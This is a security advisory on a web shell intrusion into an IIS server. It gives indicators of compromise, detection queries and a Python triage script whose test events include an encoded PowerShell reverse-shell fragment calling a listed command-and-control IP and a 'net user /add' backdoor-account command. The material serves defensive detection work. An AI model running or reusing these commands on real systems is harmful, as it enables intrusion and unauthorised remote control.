Date: 01/15/2025
Severity: High
Summary
The Trend Micro report "Investigating A Web Shell Intrusion" details an incident in which endpoint sensors flagged suspicious activity originating from an IIS worker process (w3wp.exe). The attacker had uploaded a web shell to the IIS server through an upload path that was not restricted, then used the shell to create a new user account, change an existing user's password, and launch a reverse TCP shell via encoded PowerShell commands that connected back to a command-and-control server. Detection of the anomalous w3wp.exe activity and the investigation and response that followed were key to identifying and containing the attack.
Indicators of Compromise (IOC) List
IP Address | 54.255.198.171, 86.48.10.109, 167.88.173.253 |
Hash (SHA-1) | e5746699eace0b47aa47fbefcf5aee67e67cec95, 4a8eb063e811111b03c5d2c81b20f34ccaf63dd2, c74112afef359d2bf6b2879358b9651ef8d1c12c, 7b3d29d83f2ac80a24f8eae791d563aec8311c6e, 4e49beee8548cacb2fab3e2260b2255b86fd6b13, 44ceb7e93498c89c7035bab4a494f95bc6267609 |
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Detection Query 1 | dstipaddress IN ("54.255.198.171","86.48.10.109","167.88.173.253") or ipaddress IN ("54.255.198.171","86.48.10.109","167.88.173.253") or publicipaddress IN ("54.255.198.171","86.48.10.109","167.88.173.253") or srcipaddress IN ("54.255.198.171","86.48.10.109","167.88.173.253") |
Detection Query 2 | sha1hash IN ("4a8eb063e811111b03c5d2c81b20f34ccaf63dd2","4e49beee8548cacb2fab3e2260b2255b86fd6b13","e5746699eace0b47aa47fbefcf5aee67e67cec95","c74112afef359d2bf6b2879358b9651ef8d1c12c","7b3d29d83f2ac80a24f8eae791d563aec8311c6e","44ceb7e93498c89c7035bab4a494f95bc6267609") |
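The queries above match the listed addresses and hashes directly. The Python script below is an added example, not code from the Trend Micro report or from Gurucul, that applies the same IOCs to Sysmon-style process-creation events and additionally surfaces the behaviour the summary describes: w3wp.exe spawning a shell, account manipulation via net user, and a Base64/UTF-16LE -EncodedCommand blob that, once decoded, opens a TCP client to a listed C2 address. The sample events, file paths, account name, script body and the pairing of one IOC hash with a constructed file are all constructed for illustration.

```python
"""Triage helper for the intrusion pattern summarized above: an IIS worker
(w3wp.exe) spawning shells, encoded PowerShell reverse shells and contact
with the listed C2 addresses.  Added example with constructed sample events;
not code from the Trend Micro report or from Gurucul."""
import base64
import re
from typing import Dict, List

# Network and file IOCs from the advisory
IOC_IPS = {"54.255.198.171", "86.48.10.109", "167.88.173.253"}
IOC_SHA1 = {
    "e5746699eace0b47aa47fbefcf5aee67e67cec95",
    "4a8eb063e811111b03c5d2c81b20f34ccaf63dd2",
    "c74112afef359d2bf6b2879358b9651ef8d1c12c",
    "7b3d29d83f2ac80a24f8eae791d563aec8311c6e",
    "4e49beee8548cacb2fab3e2260b2255b86fd6b13",
    "44ceb7e93498c89c7035bab4a494f95bc6267609",
}

# Children an IIS worker process has no legitimate reason to spawn (tune per environment)
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "net.exe", "net1.exe", "whoami.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENC_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
NET_USER_RE = re.compile(r"\bnet1?(?:\.exe)?\s+user\b", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_commands(cmdline: str) -> List[str]:
    """Decode every -EncodedCommand blob on a command line; skip anything that is not valid base64/UTF-16LE."""
    decoded = []
    for match in ENC_RE.finditer(cmdline):
        try:
            decoded.append(base64.b64decode(match.group(1), validate=True).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def analyze_event(event: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one Sysmon-style process-creation event."""
    findings: List[str] = []
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")

    if parent == "w3wp.exe" and image in SUSPICIOUS_CHILDREN:
        findings.append(f"IIS worker spawned {image}")
    if NET_USER_RE.search(cmdline):
        findings.append("net user invocation (account creation or password change)")

    # Sysmon formats hashes as "SHA1=...,MD5=..."; only SHA-1 is matched against the advisory
    for part in event.get("Hashes", "").split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "SHA1" and value.strip().lower() in IOC_SHA1:
            findings.append(f"known-bad SHA1 {value.strip().lower()}")

    # Decode the PowerShell payload and look for the reverse-shell pattern and C2 addresses inside it
    for script in decode_encoded_commands(cmdline):
        if "net.sockets.tcpclient" in script.lower():
            findings.append("encoded PowerShell opens a TCP client (reverse shell pattern)")
        for ip in sorted(set(IPV4_RE.findall(script)) & IOC_IPS):
            findings.append(f"encoded PowerShell references C2 {ip}")
    for ip in sorted(set(IPV4_RE.findall(cmdline)) & IOC_IPS):
        findings.append(f"command line references C2 {ip}")
    return findings


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> findings for every event that produced at least one finding."""
    return {i: f for i, ev in enumerate(events) if (f := analyze_event(ev))}


# Constructed sample events: paths, account name, script body and the hash-to-file pairing are illustrative
REVERSE_SHELL = ('$c=New-Object System.Net.Sockets.TCPClient("54.255.198.171",4444);'
                 '$s=$c.GetStream();[byte[]]$b=0..65535|%{0}')
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c net user svc_backup Passw0rd! /add"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(REVERSE_SHELL)},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\inetpub\wwwroot\uploads\update.exe",
     "CommandLine": r"C:\inetpub\wwwroot\uploads\update.exe",
     "Hashes": "SHA1=4a8eb063e811111b03c5d2c81b20f34ccaf63dd2"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc " + encode_powershell("Get-Date")},
]

if __name__ == "__main__":
    for idx, found in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(found))
```

The IOC matches are exact, so they expire as soon as the attacker rotates infrastructure or recompiles; the parent/child and decoded-payload checks are the durable part of the detection, and the decoder is deliberately tolerant of the abbreviated -e/-ec/-enc switches attackers use to dodge naive string matching on "-EncodedCommand".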
Reference:
https://www.trendmicro.com/en_us/research/25/a/investigating-a-web-shell-intrusion-with-trend-micro--managed-xd.html